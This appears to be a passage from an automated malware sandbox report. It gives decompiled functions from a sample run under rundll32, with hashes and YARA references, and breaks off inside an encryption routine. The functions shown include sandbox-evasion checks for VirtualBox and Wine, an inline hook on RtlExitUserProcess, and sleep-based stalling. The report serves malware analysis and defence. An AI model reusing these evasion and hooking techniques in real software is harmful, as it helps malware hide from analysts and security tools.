                                        • Instruction ID: 4c2418656d7868cd44b8d00b13f7d3c06fe45bf735ad53ba7b768897dabad2ff
                                        • Opcode Fuzzy Hash: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction Fuzzy Hash: E3219933365AD042FB608B11F844B9B63A1FBC8BC4F40A126AE9D4BB54DF3CC6548B00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871B7D8 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocQuery
                                        • String ID:
                                        • API String ID: 31662377-0
                                        • Opcode ID: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction ID: c7fe4e07989fb5abd603eb22b5c56e50d95ef5a0e10957e7bb16454879e1e018
                                        • Opcode Fuzzy Hash: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction Fuzzy Hash: 913194317466C481FF214B11959CB956392B348FD0F18E526ED6E1BF88DB7CC7818781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871B69C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C33871B69C(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
				void* _t16;
				intOrPtr _t24;
				void* _t25;
				long long _t42;
				intOrPtr* _t43;
				signed long long _t44;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t61;
				char* _t63;

				_t60 = __r9;
				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rdi;
				_a32 = __r9;
				GetModuleHandleA(??);
				if (__rax == 0) goto 0x3871b765;
				_a32 = __rax;
				E000001C31C33871C2B0(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
				if (_t42 == 0) goto 0x3871b765;
				 *0x3890b29c = 1;
				if ( *0x3890b29c == 1) goto 0x3871b6ea;
				_t52 =  *0x3890b508;
				if (_t52 == 0) goto 0x3871b74f;
				_t24 =  *0x3890b514;
				if (_t24 == 0) goto 0x3871b723;
				_t43 = _t52;
				if ( *_t43 == 0) goto 0x3871b759;
				_t44 = _t43 + 0x3c;
				if (1 - _t24 < 0) goto 0x3871b715;
				if (1 == 0xffffffff) goto 0x3871b74f;
				_t63 = _t44 * 0x3c + _t52;
				_t53 = _a32;
				 *((long long*)(_t63 + 1)) = _t42;
				_t16 = E000001C31C33871B4BC(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
				if (_t16 != 0) goto 0x3871b74f;
				 *_t63 = 0;
				 *0x3890b29c = 0;
				goto 0x3871b768;
				 *((char*)(_t44 * 0x3c + _t53)) = 1;
				goto 0x3871b726;
				return 0xffffffff;
			}













                                        0x1c33871b69c
                                        0x1c33871b69c
                                        0x1c33871b69c
                                        0x1c33871b6a1
                                        0x1c33871b6a6
                                        0x1c33871b6b8
                                        0x1c33871b6c3
                                        0x1c33871b6d0
                                        0x1c33871b6da
                                        0x1c33871b6e5
                                        0x1c33871b6ef
                                        0x1c33871b6f8
                                        0x1c33871b6fa
                                        0x1c33871b704
                                        0x1c33871b706
                                        0x1c33871b710
                                        0x1c33871b712
                                        0x1c33871b717
                                        0x1c33871b71b
                                        0x1c33871b721
                                        0x1c33871b729
                                        0x1c33871b731
                                        0x1c33871b734
                                        0x1c33871b73c
                                        0x1c33871b740
                                        0x1c33871b747
                                        0x1c33871b749
                                        0x1c33871b74f
                                        0x1c33871b757
                                        0x1c33871b75f
                                        0x1c33871b763
                                        0x1c33871b778

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModulelstrcmp
                                        • String ID: RtlExitUserProcess$ntdll.dll
                                        • API String ID: 4066981444-1735925572
                                        • Opcode ID: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction ID: 71d786264fe9ddc72f1395be5df15727a7dcdd876d2698b41a1a9dede0c2a6f6
                                        • Opcode Fuzzy Hash: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction Fuzzy Hash: 3121DA71345BC041FA15CB1DA89CBA86693BB853A0F18E217D97D47FE4EB39C641C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871E8F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33shareCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E000001C31C33871E8F0() {
				signed long long _v24;
				char _v552;
				intOrPtr _v568;
				int _t11;
				void* _t13;
				void* _t18;
				void* _t19;
				signed long long _t23;
				void* _t29;
				void* _t32;
				signed long long _t33;
				void* _t34;

				_t23 =  *0x38903000; // 0x9bfaf736ae76
				_v24 = _t23 ^ _t33;
				r8d = 0x208;
				E000001C31C33880E410(_t13, 0, _t18, _t19,  &_v552, _t29, _t32, _t34);
				_v568 = 0x104;
				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
				if (_t11 != 0) goto 0x3871e96f;
				__imp__StrCmpIW();
				E000001C31C33880C290();
				return 0 | _t11 == 0x00000000;
			}















                                        0x1c33871e8f7
                                        0x1c33871e901
                                        0x1c33871e910
                                        0x1c33871e916
                                        0x1c33871e920
                                        0x1c33871e932
                                        0x1c33871e93a
                                        0x1c33871e948
                                        0x1c33871e962
                                        0x1c33871e96e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameProvider
                                        • String ID: VirtualBox Shared Folders
                                        • API String ID: 262172401-2247368375
                                        • Opcode ID: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction ID: e858b28a44c7e641aaed4400445a943c7c11c88b654484dd1798df792a160625
                                        • Opcode Fuzzy Hash: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction Fuzzy Hash: 54016776365AC092FBA0DB64F8557DA2361F7C8744FC06017D95E8A655EF3CC3048B01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3387201D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: SOFTWARE\Wine
                                        • API String ID: 47109696-1166244655
                                        • Opcode ID: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction ID: 8eb5faebf2612657d2b1a01ba3d86129718e0f26fe86a24eb9d9885fd21b7863
                                        • Opcode Fuzzy Hash: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction Fuzzy Hash: E5F08936711AC082FBA09B61F455B9A63A0F7C8744F806113ED6D4B786EF3CC244CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338826904 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E000001C31C338826904(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
				void* _t6;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				void* _t27;
				void* _t33;
				void* _t36;

				_t33 = __rdx;
				_t31 = __rcx;
				_t29 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				GetLastError();
				_t13 =  *0x389032b0; // 0x7
				if (_t13 == 0xffffffff) goto 0x38826935;
				_t6 = E000001C31C338826F7C(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x38826976;
				E000001C31C338822114(_t6, _t31, _t33); // executed
				_t36 = _t27;
				if (_t27 != 0) goto 0x38826955;
				E000001C31C338824EE0(_t27, _t31);
				goto 0x3882697b;
				_t16 =  *0x389032b0; // 0x7
				if (E000001C31C338826FD4(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0x3882694e;
				E000001C31C3388265DC(_t36, _t27);
				_t11 = E000001C31C338824EE0(_t27, _t36);
				if (_t36 != 0) goto 0x38826985;
				SetLastError(??);
				goto 0x38826990;
				SetLastError(??);
				return _t11;
			}










                                        0x1c338826904
                                        0x1c338826904
                                        0x1c338826904
                                        0x1c338826904
                                        0x1c338826904
                                        0x1c338826909
                                        0x1c338826913
                                        0x1c338826919
                                        0x1c338826926
                                        0x1c338826928
                                        0x1c338826933
                                        0x1c33882693f
                                        0x1c338826944
                                        0x1c33882694a
                                        0x1c33882694e
                                        0x1c338826953
                                        0x1c338826955
                                        0x1c338826968
                                        0x1c33882696a
                                        0x1c338826971
                                        0x1c338826979
                                        0x1c33882697d
                                        0x1c338826983
                                        0x1c338826987
                                        0x1c3388269a2

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction ID: f47cb978e61f0e3f2dc0643bd9cc8247e57ac96f0d5c940ab9d421c6520212e1
                                        • Opcode Fuzzy Hash: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction Fuzzy Hash: BD11A1313817D043FB99DB25E505FA961A6BB48BE0F00E52BAD7A0F7D6DE28CB414702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720950 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction ID: 8d1a3883004b793112808f1341611ee784c2d0521d460725b5a87604d601ef4f
                                        • Opcode Fuzzy Hash: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction Fuzzy Hash: E0F0E77661AF5089EB90CB62A80938D33E5F34C740F524139D6AD86700EE39C6118F01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871B4BC Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E000001C31C33871B4BC(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
				long long _v40;
				void* __rsi;
				void* __rbp;
				signed char _t56;
				int _t61;
				void* _t65;
				void* _t66;
				void* _t73;
				void* _t78;
				signed char _t88;
				signed long long _t92;
				long long _t94;
				void* _t97;
				signed long long _t107;
				intOrPtr* _t108;
				signed long long _t109;
				intOrPtr* _t111;
				void* _t117;
				long long _t118;
				void* _t119;
				long long _t120;
				char* _t126;
				intOrPtr* _t128;

				_a8 = __rbx;
				_a32 = __r9;
				_a24 = __r8;
				r9d = r9d | 0xffffffff;
				r10d = 0;
				_t118 = __rdx;
				_t97 = __rcx;
				if ( *0x3890b514 - r10d <= 0) goto 0x3871b546;
				_t107 = __rax * 0x3c;
				_t92 =  *0x3890b508;
				if ( *((char*)(_t107 + _t92)) == 0) goto 0x3871b533;
				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0x3871b533;
				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
				r8d = 0;
				_t78 =  *_t108 - r8d;
				if (_t78 <= 0) goto 0x3871b52d;
				asm("lock bts dword [ecx+edx+0x4], 0x0");
				if (_t78 >= 0) goto 0x3871b52a;
				r8d = r8d + 1;
				if (r8d -  *_t108 < 0) goto 0x3871b510;
				goto 0x3871b52d;
				r9d = r8d;
				if (r9d != 0xffffffff) goto 0x3871b541;
				r10d = r10d + 1;
				if (r10d -  *0x3890b514 < 0) goto 0x3871b4e8;
				if (_t108 != 0) goto 0x3871b566;
				E000001C31C33871B7D8(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
				_t109 = _t92;
				if (_t92 == 0) goto 0x3871b56a;
				 *_t92 = 0x42;
				r9d = 0;
				 *((intOrPtr*)(_t92 + 4)) = 1;
				 *(_t97 + 0x38) = r9d;
				 *(_t97 + 0x30) = _t109;
				if (_t109 != 0) goto 0x3871b57a;
				goto 0x3871b68e;
				r8d = 0x2c;
				_t117 = _t92 * 0x3e + _t109;
				_t13 = _t117 + 0x16; // 0x16
				_t120 = _t13;
				E000001C31C33871B77C(0x90, _t120);
				_t56 = E000001C31C33871C02C(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
				 *(_t97 + 9) = _t56 & 0x000000ff;
				if (_t56 != 0) goto 0x3871b5b4;
				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
				goto 0x3871b573;
				_t111 =  *((intOrPtr*)(_t97 + 1));
				_t126 = _t97 + 0xa;
				if (_t126 == 0) goto 0x3871b5da;
				if (_t111 == 0) goto 0x3871b5da;
				_t88 = _t56;
				if (_t88 == 0) goto 0x3871b5da;
				 *_t126 =  *_t111;
				if (_t88 != 0) goto 0x3871b5ca;
				 *((long long*)(_t97 + 0x28)) = _t118;
				_t21 = _t117 + 4; // 0x4
				 *0x3890b290 = _t120;
				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
				r9d = 0x40;
				 *((short*)(_t117 + 8)) = 0x25ff;
				 *((long long*)(_t117 + 0xe)) = 0x1c3386e7660;
				r8d =  *(_t97 + 9) & 0x000000ff;
				_t94 =  &_a32;
				_v40 = _t94;
				_a24 = 0xe9;
				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
				if (_t61 == 0) goto 0x3871b5ae;
				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
				 *((short*)(_t117 + 0x34)) = 0x25ff;
				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
				_t128 =  *((intOrPtr*)(_t97 + 1));
				if (_t128 == 0) goto 0x3871b668;
				 *_t128 = _a24;
				 *((char*)(_t128 + 4)) = _a28;
				r8d =  *(_t97 + 9) & 0x000000ff;
				r9d = _a32;
				_v40 =  &_a32;
				VirtualProtectEx(??, ??, ??, ??, ??); // executed
				return 1;
			}


























                                        0x1c33871b4bc
                                        0x1c33871b4c1
                                        0x1c33871b4c6
                                        0x1c33871b4d2
                                        0x1c33871b4d6
                                        0x1c33871b4e0
                                        0x1c33871b4e3
                                        0x1c33871b4e6
                                        0x1c33871b4eb
                                        0x1c33871b4ef
                                        0x1c33871b4fa
                                        0x1c33871b501
                                        0x1c33871b503
                                        0x1c33871b508
                                        0x1c33871b50b
                                        0x1c33871b50e
                                        0x1c33871b517
                                        0x1c33871b51e
                                        0x1c33871b520
                                        0x1c33871b526
                                        0x1c33871b528
                                        0x1c33871b52a
                                        0x1c33871b531
                                        0x1c33871b533
                                        0x1c33871b53f
                                        0x1c33871b544
                                        0x1c33871b549
                                        0x1c33871b54e
                                        0x1c33871b554
                                        0x1c33871b556
                                        0x1c33871b55c
                                        0x1c33871b55f
                                        0x1c33871b566
                                        0x1c33871b56a
                                        0x1c33871b571
                                        0x1c33871b575
                                        0x1c33871b57d
                                        0x1c33871b587
                                        0x1c33871b58c
                                        0x1c33871b58c
                                        0x1c33871b593
                                        0x1c33871b59f
                                        0x1c33871b5a7
                                        0x1c33871b5ac
                                        0x1c33871b5ae
                                        0x1c33871b5b2
                                        0x1c33871b5b4
                                        0x1c33871b5b8
                                        0x1c33871b5bf
                                        0x1c33871b5c4
                                        0x1c33871b5c6
                                        0x1c33871b5c8
                                        0x1c33871b5cf
                                        0x1c33871b5d8
                                        0x1c33871b5da
                                        0x1c33871b5de
                                        0x1c33871b5e1
                                        0x1c33871b5f4
                                        0x1c33871b5fa
                                        0x1c33871b5fe
                                        0x1c33871b604
                                        0x1c33871b60f
                                        0x1c33871b616
                                        0x1c33871b61b
                                        0x1c33871b624
                                        0x1c33871b629
                                        0x1c33871b62e
                                        0x1c33871b636
                                        0x1c33871b63c
                                        0x1c33871b640
                                        0x1c33871b64c
                                        0x1c33871b650
                                        0x1c33871b657
                                        0x1c33871b65d
                                        0x1c33871b664
                                        0x1c33871b668
                                        0x1c33871b672
                                        0x1c33871b67a
                                        0x1c33871b683
                                        0x1c33871b69a

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction ID: 16601884616c1a19faf8da27cbfd97209790c0c3d66d3114e2229bf58c32ab24
                                        • Opcode Fuzzy Hash: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction Fuzzy Hash: 235104B22457C08AFB10CF24E548BA9BBA2F744B98F48E212CB6847FD4DB38C651C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E9060 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E000001C31C3386E9060() {
				void* _t3;
				long _t7;
				void* _t20;
				signed int _t21;

				_t3 = E000001C31C33871DF60(_t21); // executed
				if (_t3 != 0) goto 0x386e90ac;
				r8d = E000001C31C338811C60(_t20);
				r8d = r8d - ((r8d - (0x86186187 * r8d >> 0x20) >> 1) + (0x86186187 * r8d >> 0x20) >> 4) * 0x15;
				r8d = r8d + 0x19;
				Sleep(??); // executed
				_t7 = SleepEx(??, ??); // executed
				if (_t7 == 0) goto 0x386e9070;
				ExitProcess(??);
			}







                                        0x1c3386e9064
                                        0x1c3386e906b
                                        0x1c3386e9075
                                        0x1c3386e908f
                                        0x1c3386e9092
                                        0x1c3386e909d
                                        0x1c3386e90a3
                                        0x1c3386e90aa
                                        0x1c3386e90ae

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 2e1ae2b01005a82f3f8fd86224fac0ac553dab149eacfd59a0452e5db93d66d2
                                        • Instruction ID: 74d74bb59281d762d3efa50701611a69bd6bc1d2fcb3ef7e39c14cfcdbbb3571
                                        • Opcode Fuzzy Hash: 2e1ae2b01005a82f3f8fd86224fac0ac553dab149eacfd59a0452e5db93d66d2
                                        • Instruction Fuzzy Hash: 3F01AF32241BC099F7749F21AC44BDA37E8FB40728F10560A9EB44AEE9CF38C390D601
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E59D0 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E000001C31C3386E59D0(void* __rax) {
				void* _v424;
				void* _t9;

				E000001C31C33880BA74(_t9, __rax);
				asm("lock xadd [0x225c40], eax");
				if (1 != 1) goto 0x386e5a0b;
				__imp__#115(); // executed
				 *0x3890b634 = 2;
				return  *0x3890b634;
			}





                                        0x1c3386e59de
                                        0x1c3386e59e8
                                        0x1c3386e59f5
                                        0x1c3386e59ff
                                        0x1c3386e5a05
                                        0x1c3386e5a12

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup_onexit
                                        • String ID:
                                        • API String ID: 3012808385-0
                                        • Opcode ID: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction ID: 51d0dd06684aae3bd4f7891461e261fbd377ae325978380a7bef3687297e34a1
                                        • Opcode Fuzzy Hash: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction Fuzzy Hash: 35E08C32AD21D486FB10EB14E980BD82360F794718FC0A023D125C61A0DF1CC74ACB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871C2B0 Relevance: 1.4, APIs: 1, Instructions: 122stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmp
                                        • String ID:
                                        • API String ID: 1534048567-0
                                        • Opcode ID: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction ID: 8dbc114bb50e99e9ac0997ad7680c9a2789de39204833da6b6addadb69a35f9f
                                        • Opcode Fuzzy Hash: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction Fuzzy Hash: C74108323455A487FA24CF85E849BBD77A2F780784F14E432DF9A47E44E774EA918702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338822114 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C338822114(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x38822133;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x38822176;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x3882215a;
				if (E000001C31C338830330() == 0) goto 0x38822176;
				if (E000001C31C338825368(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x38822176;
				HeapAlloc(??, ??, ??); // executed
				if (_t22 == 0) goto 0x38822145;
				goto 0x38822183;
				E000001C31C338818984(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                                        0x1c338822114
                                        0x1c338822123
                                        0x1c338822127
                                        0x1c338822127
                                        0x1c338822131
                                        0x1c33882213f
                                        0x1c338822143
                                        0x1c33882214c
                                        0x1c338822158
                                        0x1c338822169
                                        0x1c338822172
                                        0x1c338822174
                                        0x1c338822176
                                        0x1c33882217b
                                        0x1c338822188

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction ID: 992b5b24b675596130631ac16a8dea862a4f4be6de2ba680c2dfe88f3b468105
                                        • Opcode Fuzzy Hash: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction Fuzzy Hash: 6FF062743812C951FE549671D951FD582913B98780F0CF4264E29CE3D1EF6CD7908112
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386EAE60 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C3386EAE60(void* __edx, long long __rax, void* __rcx, char _a16) {
				long long _v16;
				intOrPtr _v24;
				void* _t25;
				long long _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t33 = __rcx;
				_a16 = 0;
				if (__edx != 1) goto 0x386eaf05;
				asm("o16 nop [eax+eax]");
				 *0x3890b29c = 1;
				if ( *0x3890b29c == 1) goto 0x386eae80;
				if ( *0x3890b508 == 0) goto 0x386eaea4;
				 *0x3890b29c = 0;
				goto 0x386eaed4;
				r8d = 0x3000;
				_t4 = _t33 + 4; // 0x4, executed
				r9d = _t4;
				VirtualAlloc(??, ??, ??, ??); // executed
				 *0x3890b514 = 0xa;
				 *0x3890b508 = __rax;
				 *0x3890b29c = 0;
				E000001C31C33871B69C(_t25, __rax, _t32, _t34, _t37); // executed
				_t31 =  &_a16;
				r9d = 0;
				_v16 = _t31;
				_v24 = 0;
				E000001C31C338811DF0(0, 0, _t31, _t32, _t33, _t35, 0x1c3386e90c0, _t37); // executed
				 *0x3890b4a8 = _t31;
				return 1;
			}












                                        0x1c3386eae60
                                        0x1c3386eae64
                                        0x1c3386eae6f
                                        0x1c3386eae75
                                        0x1c3386eae85
                                        0x1c3386eae8e
                                        0x1c3386eae98
                                        0x1c3386eae9c
                                        0x1c3386eaea2
                                        0x1c3386eaeab
                                        0x1c3386eaeb1
                                        0x1c3386eaeb1
                                        0x1c3386eaeb5
                                        0x1c3386eaebd
                                        0x1c3386eaec7
                                        0x1c3386eaece
                                        0x1c3386eaed4
                                        0x1c3386eaed9
                                        0x1c3386eaede
                                        0x1c3386eaee1
                                        0x1c3386eaeef
                                        0x1c3386eaef9
                                        0x1c3386eaefe
                                        0x1c3386eaf0e

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction ID: 28cd0d375bd5f4469fa48bd822ffa50875b61a8b07a51d738087ec9d90e19139
                                        • Opcode Fuzzy Hash: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction Fuzzy Hash: D4118CB06816C08AF7258B24E905BC937E0FB59308FA0E02BC669876B0DB3DC340CF42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 000001C33872FCB0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 222encryptionCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 21%
                                        			E000001C31C33872FCB0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r12) {
				void* __rbp;
				int _t50;
				signed int _t74;
				int _t101;
				signed long long _t134;
				signed long long _t135;
				int _t139;
				char* _t158;
				void* _t169;
				signed long long _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				E000001C31C33880C220();
				_t173 = _t172 - __rax;
				_t171 = _t173 + 0x30;
				 *((long long*)(_t171 + 0x40)) = __rbx;
				 *((long long*)(_t171 + 0x48)) = __rsi;
				 *((long long*)(_t171 + 0x50)) = __rdi;
				 *((long long*)(_t171 + 0x58)) = __r12;
